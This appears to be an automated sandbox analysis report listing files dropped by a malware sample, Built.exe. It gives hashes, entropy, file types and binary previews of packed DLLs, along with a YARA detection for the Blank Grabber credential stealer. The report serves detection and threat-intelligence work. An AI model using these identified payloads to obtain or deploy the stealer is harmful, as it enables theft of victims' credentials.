                                                  Preview:PK........(v.X................stub-o.pyc..........lf.(...............................e.....e...e...e.g.d...........j.....................................e.g.d...........j.....................................e.g.d...................j...................................Z...e.....e...e...e.g.d...........j.....................................e.g.d...........j.....................................e.g.d...................j...................................Z...e.....e...e...e.g.d...........j.....................................e.g.d...........j.....................................e.g.d...................j...................................Z...e.....e...e...e.g.d...........j.....................................e.g.d...........j.....................................e.g.d...................j...................................Z.d...Z.d.Z.....e...e.....e...e...e.g.d...........j.....................................e.g.d...........j.....................................e.g.d...................j.......
                                                  Process:C:\Users\user\AppData\Local\Temp\Built.exe
                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):1635096
                                                  Entropy (8bit):7.95287803315892
                                                  Encrypted:false
                                                  SSDEEP:49152:z6H83HeiR86t/czBf6Y1z8kq5HaMpW/9nn3nL/obN1CPwDvt3uFlDCP:z6c3CFFz8BBpWtbU1CPwDvt3uFlDCP
                                                  MD5:7F1B899D2015164AB951D04EBB91E9AC
                                                  SHA1:1223986C8A1CBB57EF1725175986E15018CC9EAB
                                                  SHA-256:41201D2F29CF3BC16BF32C8CECF3B89E82FEC3E5572EB38A578AE0FB0C5A2986
                                                  SHA-512:CA227B6F998CACCA3EB6A8F18D63F8F18633AB4B8464FB8B47CAA010687A64516181AD0701C794D6BFE3F153662EA94779B4F70A5A5A94BB3066D8A011B4310D
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............l..l..l......l...m..l...i..l...h..l...o..l..m.y.l...m...l...o..l...h.l...l..l......l...n..l.Rich.l.........PE..d......e.........." ...%.0........9.`.O...9...................................R...........`......................................... .P......P.h.....P.......K.d............R..................................... .O.@...........................................UPX0......9.............................UPX1.....0....9..0..................@....rsrc.........P......4..............@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                  Process:C:\Users\user\AppData\Local\Temp\Built.exe
                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):29968
                                                  Entropy (8bit):7.677818197322094
                                                  Encrypted:false
                                                  SSDEEP:768:3p/6aepjG56w24Up3p45YiSyvkIPxWEqG:tA154spK7SytPxF
                                                  MD5:08B000C3D990BC018FCB91A1E175E06E
                                                  SHA1:BD0CE09BB3414D11C91316113C2BECFFF0862D0D
                                                  SHA-256:135C772B42BA6353757A4D076CE03DBF792456143B42D25A62066DA46144FECE
                                                  SHA-512:8820D297AEDA5A5EBE1306E7664F7A95421751DB60D71DC20DA251BCDFDC73F3FD0B22546BD62E62D7AA44DFE702E4032FE78802FB16EE6C2583D65ABC891CBF
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........iV...8...8...8..p....8.t9...8.p9...8...9...8.t=...8.t<...8.t;...8.1t<...8.1t;...8.1t8...8.1t:...8.Rich..8.........................PE..d...Sh.c.........." ...".@................................................................`.....................................................................P.......................................................@...........................................UPX0....................................UPX1.....@.......<..................@...UPX2.................@..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                  Process:C:\Users\user\AppData\Local\Temp\Built.exe
                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):228120
                                                  Entropy (8bit):7.928688904391487
                                                  Encrypted:false
                                                  SSDEEP:6144:Gmlccqt6UmyaQeUV1BXKtS68fp2FagXlk2:l+t6Ce6XKtSHYomk2
                                                  MD5:264BE59FF04E5DCD1D020F16AAB3C8CB
                                                  SHA1:2D7E186C688B34FDB4C85A3FCE0BEFF39B15D50E
                                                  SHA-256:358B59DA9580E7102ADFC1BE9400ACEA18BC49474DB26F2F8BACB4B8839CE49D
                                                  SHA-512:9ABB96549724AFFB2E69E5CB2C834ECEA3F882F2F7392F2F8811B8B0DB57C5340AB21BE60F1798C7AB05F93692EB0AEAB077CAF7E9B7BB278AD374FF3C52D248
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........>:V.PiV.PiV.Pi_..iX.PiC.QhT.Pi..QhT.PiC.UhZ.PiC.Th^.PiC.ShR.PillQhU.PiV.QiH.PillThf.PillPhW.Pill.iW.PillRhW.PiRichV.Pi................PE..d......e.........." ...%.....P...p...m....................................................`............................................,C......8...............@M...................................................y..@...........................................UPX0.....p..............................UPX1................................@....rsrc....P.......L..................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                  Process:C:\Users\user\AppData\Local\Temp\Built.exe
                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):1806616
                                                  Entropy (8bit):7.993924698335258
                                                  Encrypted:true
                                                  SSDEEP:49152:xm7u77uID/cZXnJ4Ph3tLm82R8PeDCemJ:Y7uJcZX6pumfJ
                                                  MD5:FB8BEDF8440EB432C9F3587B8114ABC0
                                                  SHA1:136BB4DD38A7F6CB3E2613910607131C97674F7C
                                                  SHA-256:CB627A3C89DE8E114C95BDA70E9E75C73310EB8AF6CF3A937B1E3678C8F525B6
                                                  SHA-512:B632235D5F60370EFA23F8C50170A8AC569BA3705EC3D515EFCAD14009E0641649AB0F2139F06868024D929DEFFFFFEFB352BD2516E8CD084E11557B31E95A63
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ ._.A...A...A.......A.......A.......A.......A.......A...9e..A...9...A...A...@......cA.......A.......A.......A..Rich.A..........PE..d...cK.f.........." ...&..........P..ak...P..................................Pl...........`.........................................H.k.d....yk......pk......._.TI...........Ll. ...........................0mk.(...pmk.@...........................................UPX0......P.............................UPX1..........P.....................@....rsrc........pk.....................@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                  Process:C:\Users\user\AppData\Local\Temp\Built.exe
                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):630736
                                                  Entropy (8bit):6.409476333013752
                                                  Encrypted:false
                                                  SSDEEP:12288:3lPCcFDlj+gV4zOifKlOWVNcjfQww0S5JPgdbBC9qxbYG9Y:3lPCcvj+YYrfSOWVNcj1JS5JPgdbBCZd
                                                  MD5:9C223575AE5B9544BC3D69AC6364F75E
                                                  SHA1:8A1CB5EE02C742E937FEBC57609AC312247BA386
                                                  SHA-256:90341AC8DCC9EC5F9EFE89945A381EB701FE15C3196F594D9D9F0F67B4FC2213
                                                  SHA-512:57663E2C07B56024AAAE07515EE3A56B2F5068EBB2F2DC42BE95D1224376C2458DA21C965AAB6AE54DE780CB874C2FC9DE83D9089ABF4536DE0F50FACA582D09
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........@.a.@.a.@.a..v..F.a..v....a..v..M.a..J..B.a.{.b.H.a.{.d.j.a.{.e.U.a.I..K.a.@.`...a..d...a....A.a..c.A.a.Rich@.a.................PE..d....~.^.........."..........2.................@.............................p.......4....`..................................................]..x.......Xy......pD...`...?...`..........T...................x...(.......................@............................text...C........................... ..`.rdata..:p.......r..................@..@.data............2...b..............@....pdata..pD.......F..................@..@.tls................................@....rsrc...Xy.......z..................@..@.reloc.......`.......V..............@..B................................................................................................................................................................................................
                                                  Process:C:\Users\user\AppData\Local\Temp\Built.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):456
                                                  Entropy (8bit):4.447296373872587
                                                  Encrypted:false
                                                  SSDEEP:12:Bn9j9sxpCDPxfhKLiaE5cNH0u/OCIhjWO:B9jiWDpf025cNU7CIEO
                                                  MD5:4531984CAD7DACF24C086830068C4ABE
                                                  SHA1:FA7C8C46677AF01A83CF652EF30BA39B2AAE14C3
                                                  SHA-256:58209C8AB4191E834FFE2ECD003FD7A830D3650F0FD1355A74EB8A47C61D4211
                                                  SHA-512:00056F471945D838EF2CE56D51C32967879FE54FCBF93A237ED85A98E27C5C8D2A39BC815B41C15CAACE2071EDD0239D775A31D1794DC4DBA49E7ECFF1555122
                                                  Malicious:true
                                                  Yara Hits:
                                                  • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: C:\Users\user\AppData\Local\Temp\_MEI66162\rarreg.key, Author: Joe Security
                                                  Preview:RAR registration data.Blank-c.Stealer License.UID=e7ae0ee11c8703113d95.64122122503d95ca34668bc2ffb72bcf8579be24bc20f3cd84baaf.afcf62e30badf158ad0c60feb872189f288e79eb40c28ca0ab6407.3a46f47624f80a44a0e4d71ef4224075bf9e28fce340a29099d287.15690be6b591c3bb355e99d6d1b8ffcd69602cb8aaa6dedf268c83.55c1fb90c384a926139625f6c0cbfc57a96996fdb04075bf9e28fc.e340a29067e9237e333577d2c7f3ed1d0f63287f74c9e50c60d76d.b5915ff59f78103d48e0826658d72ba8813da4a649711057613203.
                                                  Process:C:\Users\user\AppData\Local\Temp\Built.exe
                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):26392
                                                  Entropy (8bit):7.4349429154342905
                                                  Encrypted:false
                                                  SSDEEP:768:GW9SNyB153wXwCp5DlIjQGO/5YiSyv38aAMxkE7:4a3aDlIjQGOx7Sy/8Yxn
                                                  MD5:08B4CAEACCB6F6D27250E6A268C723BE
                                                  SHA1:575C11F72C8D0A025C307CB12EFA5CB06705561D
                                                  SHA-256:BD853435608486555091146AB34B71A9247F4AAA9F7ECFBC3B728A3E3EFDE436
                                                  SHA-512:9B525395DEC028EF3286C75B88F768E5D40195D4D5ADAB0775C64B623345D81DA1566596CC61A460681BC0ADBA9727AFC96C98AD2E54FF371919F3DB6D369B0C
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......&.tb..'b..'b..'k.V'`..'d(.&`..'d(.&n..'d(.&j..'d(.&f..'.(.&`..'b..' ..')..&g..'.(.&c..'.(.&c..'.(:'c..'.(.&c..'Richb..'........PE..d....K.f.........." ...&.0................................................................`......................................... ...L....................`..............l...........................................@...........................................UPX0....................................UPX1.....0.......(..................@....rsrc................,..............@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                  Process:C:\Users\user\AppData\Local\Temp\Built.exe
                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):660248
                                                  Entropy (8bit):7.993344862024604
                                                  Encrypted:true
                                                  SSDEEP:12288:QTdlyELYyNiFVhF+v4GTHxoyMnYllAuz1eRDRA8z7B/oe7zMdxsp2gB:QTdlyK5oFVDQ4GGYsaejd1/oeTp2gB
                                                  MD5:482B3F8ADF64F96AD4C81AE3E7C0FB35
                                                  SHA1:91891D0EABB33211970608F07850720BD8C44734
                                                  SHA-256:1FBDB4020352E18748434EF6F86B7346F48D6FB9A72C853BE7B05E0E53EBBB03
                                                  SHA-512:5DE56E00AB6F48FFC836471421D4E360D913A78EE8E071896A2CD951FF20F7A4123ABD98ADF003CE166DCC82AAD248EBF8B63E55E14ECEEC8AA9A030067C0D1D
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........l..l..l...B..l.....l.....l.....l.....l.....l..l..l.....l.....l......l.....l.Rich.l.................PE..d....K.f.........." ...&.....0...........................................................`..............................................#......................h......................................................@...........................................UPX0....................................UPX1................................@....rsrc....0.......0..................@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                  Process:C:\Users\user\AppData\Local\Temp\Built.exe
                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):302360
                                                  Entropy (8bit):7.986911403608574
                                                  Encrypted:false
                                                  SSDEEP:6144:CI6xDUAPCa+tr3XyOu6sNq64AnCK+V3evv7J7usiUZonaJnZ54QZ:CDLB+tryJ6sI647m7Fu4oM4QZ
                                                  MD5:27B3AF74DDAF9BCA239BF2503BF7E45B
                                                  SHA1:80A09257F9A4212E2765D492366ED1E60D409E04
                                                  SHA-256:584C2ECEA23DFC72AB793B3FD1059B3EA6FDF885291A3C7A166157CF0E6491C4
                                                  SHA-512:329C3A9159EA2FDCE5E7A28070BCF9D6D67ECA0B27C4564E5250E7A407C8B551B68A034BFDE9D8D688FA5A1AE6E29E132497B3A630796A97B464762CA0D81BB7
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........aM...#...#...#..x....#.."...#..&...#..'...#.. ...#..."...#..x"...#..."...#.......#...#...#......#...!...#.Rich..#.................PE..d....K.f.........." ...&.`.......0.......@................................................`.............................................X....................@.........................................................@...........................................UPX0.....0..............................UPX1.....`...@...\..................@....rsrc................`..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                  File Type:MSVC .res
                                                  Category:dropped
                                                  Size (bytes):652
                                                  Entropy (8bit):3.1120484782655193
                                                  Encrypted:false
                                                  SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryXak7YnqqzPN5Dlq5J:+RI+ycuZhNVakSzPNnqX
                                                  MD5:6765F3A82EB5804A78B20B2EA217CCE9
                                                  SHA1:5C081209E0F34D593219B9E4E576892B76C3ED4A
                                                  SHA-256:93C03D6D91C60B8DBC99968647F788824A6D3790BF12EDA09EA20D1690D5EFE3
                                                  SHA-512:8024ABBED440A5C329F87346B994EA51B6C73541B09FFDB5F2C71DB9FA466FEC67DC1C47FBAACFE7F8C814250BEFA8289587BBE6D9A35B3DABADD037022540FF
                                                  Malicious:false
                                                  Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...g.k.f.h.m.5.n.3...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...g.k.f.h.m.5.n.3...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1004
                                                  Entropy (8bit):4.154581034278981
                                                  Encrypted:false
                                                  SSDEEP:24:Jo4KMz04F03wykl4qk6oAuBGOUBrRmLW+7UCPa:Jo4hz0BAl4xBQ0XQCC
                                                  MD5:C76055A0388B713A1EABE16130684DC3
                                                  SHA1:EE11E84CF41D8A43340F7102E17660072906C402
                                                  SHA-256:8A3CD008E86A3D835F55F8415F5FD264C6DACDF0B7286E6854EA3F5A363390E7
                                                  SHA-512:22D2804491D90B03BB4B640CB5E2A37D57766C6D82CAF993770DCF2CF97D0F07493C870761F3ECEA15531BD434B780E13AE065A1606681B32A77DBF6906FB4E2
                                                  Malicious:false
